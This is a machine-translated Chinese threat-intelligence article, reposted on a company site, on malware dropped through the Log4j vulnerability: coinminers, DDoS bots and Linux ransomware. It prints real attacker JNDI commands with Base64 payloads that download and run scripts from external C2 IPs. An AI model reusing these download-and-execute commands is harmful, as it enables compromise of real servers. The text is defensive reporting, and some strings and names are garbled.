上周,Log4j 漏洞顛覆了互聯(lián)網(wǎng),影響是巨大。攻擊者也已經(jīng)開始利用該漏,到目前為止,Uptycs 研究人員已經(jīng)觀察到與 coinminers、DDOS 惡意軟件和一些勒索軟件變種相關(guān)的攻擊,這些攻擊積極利用了此漏洞。
未來(lái)幾天勒索軟件攻擊的規(guī)??赡軙?huì)增加。由于該漏洞非常嚴(yán)重,因此可能還會(huì)發(fā)現(xiàn)一些可以繞過(guò)當(dāng)前補(bǔ)丁級(jí)別或修復(fù)程序的變體。因針對(duì)這種攻擊持續(xù)監(jiān)控和強(qiáng)化系統(tǒng)是極其重要的。
Uptycs 此前在博客中為其客戶分享了有關(guān)補(bǔ)救和檢測(cè)步驟的詳細(xì)信息 。并討論了攻擊者利用 Log4j 漏洞的各種惡意軟件類別。Uptycs 威脅研究團(tuán)隊(duì)確定了投放在易受攻擊的服務(wù)器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件,如 Kinsing 和 Xmrig coinminers,以及 Dofloo、Tsunami 和 Mirai 僵尸網(wǎng)絡(luò)惡意軟件。除了這些惡意軟件系列,攻擊者已經(jīng)開始在在易受CVE-2021-44228服務(wù)器上部署勒索軟件。
1. Xmrig
Xmrig 是一個(gè)開源的 Monero CPU Miner,用于挖掘 Monero 加密貨幣。攻擊者利用 Log4j2 漏洞后,攻擊者試圖運(yùn)行惡意 shell 腳本,其中包含下載 xmrig 礦工的命令。
命令是 93.189.42 8 []:5557,/基本/命令/ Base64/編碼 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。
此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6
shell 腳本(見圖 1)首先殺死已經(jīng)在運(yùn)行的礦工二進(jìn)制文件,然后從互聯(lián)網(wǎng)下載 xmrig 礦工二進(jìn)制文件并運(yùn)行它。
圖 1:Shell 腳本下載并執(zhí)行 Xmrig
2. Kinsing
Kinsing 是一種自我傳播的加密挖掘惡意軟件,以前針對(duì)配置錯(cuò)誤的開放 Docker Daemon API 端口。Kinsing 惡意軟件是用 golang 編寫的,通常是通過(guò)惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規(guī)避技術(shù),如 setfacl 使用、chattr 使用、日志刪除命令等。
大規(guī)模掃描后的攻擊者試圖在易受攻擊的服務(wù)器上放置 kinsing 二進(jìn)制文件。攻擊者用來(lái)刪除和運(yùn)行 shell 腳本的:92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.
在shell腳本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我們可以看到攻擊者在 shell 腳本運(yùn)行時(shí)放置了刪除 kinsing 惡意軟件二進(jìn)制文件的命令(見圖 2)。
圖 2:通過(guò) shell 腳本下載 Kinsing
kinsing shell 腳本還包含與 docker 相關(guān)的命令,這些命令會(huì)殺死受害系統(tǒng)上已經(jīng)運(yùn)行的礦工進(jìn)程(如果存在)。
圖 3:用于殺死已經(jīng)運(yùn)行的礦工的 docker 命令
3. DDoS 僵尸網(wǎng)絡(luò)負(fù)載
在一些漏洞利用嘗試中,攻擊者試圖刪除分布式拒絕服務(wù) (DDoS) 惡意軟件二進(jìn)制文件,如 dofloo、Mirai。
4. Dofloo
Dofloo (又名 AeSDdos,flooder)是一種DDoS類型的惡意軟件,可對(duì)目標(biāo) IP 地址進(jìn)行各種泛洪攻擊,如 ICMP 和 TCP。除了泛洪攻擊外,Dofloo 通過(guò)操縱受害者系統(tǒng)中的 rc.local 文件來(lái)確保其持久性。它的一些變體在受害計(jì)算機(jī)上部署了加密貨幣礦工。
在情報(bào)系統(tǒng)中,攻擊者也在利用易受攻擊的服務(wù)器后投放 Dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []:1389,/基本/命令/ Base64編碼/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下圖(參見圖 4)顯示了 Dofloo 對(duì) rc.local 的操作:6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548)在 Log4j 后利用中使用的變體。
圖 4:Dofloo 操作 rc.local
5. mushtik
海嘯(又名mushtik)是基于DDoSflooder一個(gè)跨平臺(tái)的惡意軟件,在下載文件過(guò)程中被感染系統(tǒng)中執(zhí)行shell的命令。海嘯樣本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作為持久性。除了持久性,它還刪除一個(gè)副本 /dev/shm/ 目錄作為防御規(guī)避策略(參見圖 5)。
圖 5:Tsunami 通過(guò) cron 從 /dev/shm 運(yùn)行
6. Mirai
Mirai是一種惡意軟件,它感染在 ARC 處理器上運(yùn)行的智能設(shè)備,將它們變成一個(gè)遠(yuǎn)程控制的機(jī)器人網(wǎng)絡(luò)。Mirai 還通過(guò)惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。該命令使用 wget 實(shí)用程序從攻擊者 C2,62.210.130[.]250 中刪除 Mirai 惡意軟件(見圖 6)。
圖 6:從 C2 下載 mirai 的 Shell 腳本
7. Linux
攻擊者還利用 Log4j 漏洞在易受攻擊的服務(wù)器上投放 Linux 勒索軟件。攻擊者在利用 Log4j 漏洞后試圖刪除Linux 勒索軟件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的,并操縱 ssh 文件在受害者系統(tǒng)中傳播自身。攻擊者丟棄的贖金票據(jù)如下所示(見圖 7)。
圖 7:Linux 贖金說(shuō)明
8. Uptycs EDR
Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 進(jìn)程掃描的行為規(guī)則成功檢測(cè)到所有有效負(fù)載。下面顯示了我們的行為規(guī)則主動(dòng)檢測(cè)到的 Linux 勒索軟件的示例(參見圖 8)。
圖 8:使用 Uptycs EDR 檢測(cè)勒索軟件
9. Xmrig
除了行為規(guī)則之外,當(dāng) YARA 檢測(cè)被觸發(fā)時(shí),Uptycs EDR 通過(guò)威脅研究團(tuán)隊(duì)策劃的 YARA 規(guī)則分配威脅配置文件。用戶可以導(dǎo)航到檢測(cè)警報(bào)中的工具包數(shù)據(jù)部分,然后單擊名稱以查找工具包的說(shuō)明。Uptycs EDR 檢測(cè)到的 Xmrig 惡意軟件活動(dòng)的摘錄如下所示(見圖 9)。
圖 9:使用 Uptycs EDR 進(jìn)行 XMrig 檢測(cè)
網(wǎng)頁(yè)題目:盤點(diǎn):Log4j漏洞帶來(lái)的深遠(yuǎn)影響
文章位置:http://jinyejixie.com/news4/201854.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計(jì)、微信小程序、網(wǎng)站導(dǎo)航、微信公眾號(hào)、用戶體驗(yàn)、網(wǎng)站設(shè)計(jì)公司
廣告
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源:
創(chuàng)新互聯(lián)